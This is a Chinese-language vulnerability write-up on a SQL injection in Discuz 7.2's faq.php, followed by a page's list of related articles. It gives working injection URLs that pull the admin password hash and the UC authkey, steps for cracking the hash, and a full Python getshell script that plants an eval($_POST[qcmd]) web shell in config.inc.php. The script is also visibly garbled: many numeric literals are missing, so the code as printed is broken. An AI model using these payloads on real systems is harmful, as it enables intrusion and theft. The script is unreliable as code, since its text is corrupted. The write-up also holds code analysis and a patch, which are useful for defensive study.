catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

. 通过获取管理员密码

. 对管理员密码进行破解。通过在cmd5.com网站对管理密码进行查询,需要带salt,获取的salt要去掉最后一个数字""

例如下面获取: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71

需要查询的是: c6c45f444cf6a41b309c9401ab9a55a7:066ff7

. 通过uc_key获取shell

. 进入后台,添加插件获取webshell

Relevant Link:

http://sebug.net/vuldb/ssvid-87115

http://sebug.net/vuldb/ssvid-87114

2. 漏洞触发条件

.获取数据库版本信息

http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

.获取管理员账户密码

http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

.获取key

http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23

//通过error based injection报错获得注入信息

0x1: POC

import sys,urllib,time,math,base64,hashlib,urllib2

#contant raw

def fg(kaishi, jieshu, wenben):

    start = wenben.find(kaishi);

    if start >= :

        start += len(kaishi);

        jieshu = wenben.find(jieshu, start);

        if jieshu >= :

            return wenben[start:jieshu].strip();

#microtime

def microtime(get_as_float = False) :

    if get_as_float:

        return time.time();

    else:

        return '%.8f %d' % math.modf(time.time());

#authget

def get_authcode(string, key = ''):

    ckey_length = ;

    key = hashlib.md5(key).hexdigest();

    keya = hashlib.md5(key[:]).hexdigest();

    keyb = hashlib.md5(key[:]).hexdigest();

    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:];

    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]

    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest();

    key_length = len(cryptkey);

    string = '' + (hashlib.md5(string+keyb)).hexdigest()[:]+string;

    string_length = len(string);

    result = '';

    box = range(, );

    rndkey = dict();

    for i in range(,):

        rndkey[i] = ord(cryptkey[i % key_length]);

    j=;

    for i in range(,):

        j = (j + box[i] + rndkey[i]) % ;

        tmp = box[i];

        box[i] = box[j];

        box[j] = tmp;

    a=;

    j=;

    for i in range(,string_length):

        a = (a + ) % ;

        j = (j + box[a]) % ;

        tmp = box[a];

        box[a] = box[j];

        box[j] = tmp;

        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % ]));

    return keyc + base64.b64encode(result).replace('=', '');

#getshell

def get_shell(url0,key,host):

    headers={'Accept-Language':'zh-cn',

             'Content-Type':'application/x-www-form-urlencoded',

             'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',

             'Referer':url0

             };

    tm = time.time()+*;

    tm="time=%d&action=updateapps" %tm;

    code = urllib.quote(get_authcode(tm,key));

    url0=url0+"?code="+code;

    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>

            <root>

            <item id="UC_API">http://xxx\');eval($_POST[qcmd]);//</item>

            </root>''';

    try:

        req=urllib2.Request(url0,data=data1,headers=headers);

        ret=urllib2.urlopen(req);

    except:

        return "error to read";

    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>

            <root>

            <item id="UC_API">http://aaa</item>

            </root>''';

    try:

        req=urllib2.Request(url0,data=data2,headers=headers);

        ret=urllib2.urlopen(req);

    except:

        return "error";

    return "OK: "+host+"/config.inc.php | Password = qcmd";  #去掉/config/uc_config.php 为config.inc.php by niubl

#define over

#url from users

right = len(sys.argv);

if right < :

    #note

    print ("============================================================");

    print ("Discuz <= 7.2 Getshell");

    print ("Wrote by Airbasic");

    print ("Usage: py.exe " + sys.argv[] + " http://localhost/dz");

    print ("============================================================");

    raw_input("");

    sys.exit()

url = sys.argv[];

#go

url1 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";

url2 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";

#authkey1~

wy1 = urllib.urlopen(url1);

nr1 = wy1.read();

authkey1 = fg("'1:","' for",nr1);

#authkey32~

wy2 = urllib.urlopen(url2);

nr2 = wy2.read();

authkey2 = fg("'1:","' for",nr2);

#authkey

authkey = authkey1+authkey2;

#get username and password

#none

#over

#get webshell

url0 = url + "/api/uc.php";

host = url;

print ("Wrote by Airbasic , GetShell Ok !");

print get_shell(url0,authkey,host);

raw_input("");

Relevant Link:

http://blog.csdn.net/yiyefangzhou24/article/details/36913287

http://qqhack8.blog.163.com/blog/static/11414798520146711246279/

3. 漏洞影响范围
4. 漏洞代码分析

/faq.php

..

elseif($action == 'grouppermission')

{

    ..

    //首先定义一个数组groupids,然后遍历$gids(这也是个数组,就是$_GET[gids])

    $groupids = array();

    foreach($gids as $row)

    {

        //将数组中的所有值的第一位取出来放在groupids中

        $groupids[] = $row[];

        /*

        这里的安全漏洞在于

        discuz在全局会对GET数组进行addslashes转义,也就是说会将单引号"'"转义成"\'"

        所以,如果我们的传入的参数是: gids[1]='的话,会被转义成$gids[1]=\',而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符,也就是"\",把转义符号取出来了

        */

    }

    /*

    在将数据放入sql语句前,通过implodeids函数对$groupids进行处理了一遍

    就是将刚才的$groupids数组用','分割开,组成一个类似于'1','2','3','4'的字符串返回。但是我们的数组刚取出来一个转义符,它会将这里一个正常的'转义掉,比如这样:'1','\','3','4'

    这样就把原本的用于闭合的单引号给转义了,使得黑客的注入数据得以"逃逸",也就是产生的注入,我们把报错语句放在3这个位置,就能报错

    */

    $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");

    $groups = array();

    ..

Relevant Link:

http://simeon.blog.51cto.com/18680/1440000

5. 防御方法

/faq.php

elseif($action == 'grouppermission')

{

    /* 对$gids进行初始化 */

    $gids = array();

    /* */

Relevant Link:

http://www.crazydb.com/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXP

http://simeon.blog.51cto.com/18680/1440000

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

discuz /faq.php SQL Injection Vul的更多相关文章

  1. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  2. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  3. ecshop /goods.php SQL Injection Vul

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: poc http://localhost ...

  4. ecshop /category.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuld ...

  5. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/client/api. ...

  6. ecshop /flow.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏 ...

  7. ecshop /includes/modules/payment/alipay.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/ ...

  8. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

  9. dedecms /member/uploads_edit.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms 5.3版本下的member/uploads_edit.p ...

随机推荐

  1. 通用权限管理系统数据字典 V3.9 版本,欢迎开发个各种业务系统的朋友们,参考表结构

    C#.NET通用权限管理系统组件数据字典 导  航 ◇ (01) BaseItemDetails ◇ (02) BaseItems ◇ (03) BaseLog ◇ (04) BaseMessage ...

  2. git 找回丢失的commit

    From : http://dmouse.iteye.com/blog/1797267 git 的错误操作,导致丢失了重要的commit,真是痛不欲生: 最后通过git神器终于找回了丢失的commit ...

  3. Linux 信号详解五(信号阻塞,信号未决)

    信号在内核中的表示 执行信号的处理动作成为信号递达(Delivery),信号从产生到递达之间的状态称为信号未决(Pending).进程可以选择阻塞(Block)某个信号. 被阻塞的信号产生时将保持在未 ...

  4. [转]C#压缩打包文件

    /// <summary> /// 压缩和解压文件 /// </summary> public class ZipClass { /// <summary> /// ...

  5. C#之发送邮件汇总

    最近想搞个网站,其中找回密码用到了我们常见到的利用邮箱找回.利用邮箱的好处是可以有效确认修改密码者的身份. 百度了几篇博客,各有千秋.最终采用了QI Fei同志的博客,有Demo下载,看了看思路清晰, ...

  6. go println与printf区别

    Println 与Printf 都是fmt 包中的公共方法 Println :可以打印出字符串,和变量: Printf : 只可以打印出格式化的字符串,可以输出字符串类型的变量,不可以输出整形变量和整 ...

  7. JavaScript数独求解器

    <html> <head> <style type="text/css"> .txt { width: 50; height: 50; back ...

  8. C++11异常处理 noexcept

    1.简介 在C语言中,如果程序的运行出现异常.错误,我们想提供方案处理这些异常时,我们面临许多问题,如: (1)C语言没有提供统一(标准)的方式来处理错误: (2)无法保证错误会被正确的处理: (3) ...

  9. Android下的数据储存方式(三)

      Android下最好的数据储存方式:关系型数据库sqlite.   数据库的创建:使用SqliteOpenHelper类 结合SqliteOpenHelper类和SQLiteDatabase类的帮 ...

  10. Asp.Net Form验证不通过,重复登录

    问题产生根源: 当然,其实应该需要保持线上所有机器环境一致!可是,写了一个小程序.使用的是4.5,aysnc/await实在太好用了,真心不想把代码修改回去. so,动了念头,在这台服务器上装个4.5 ...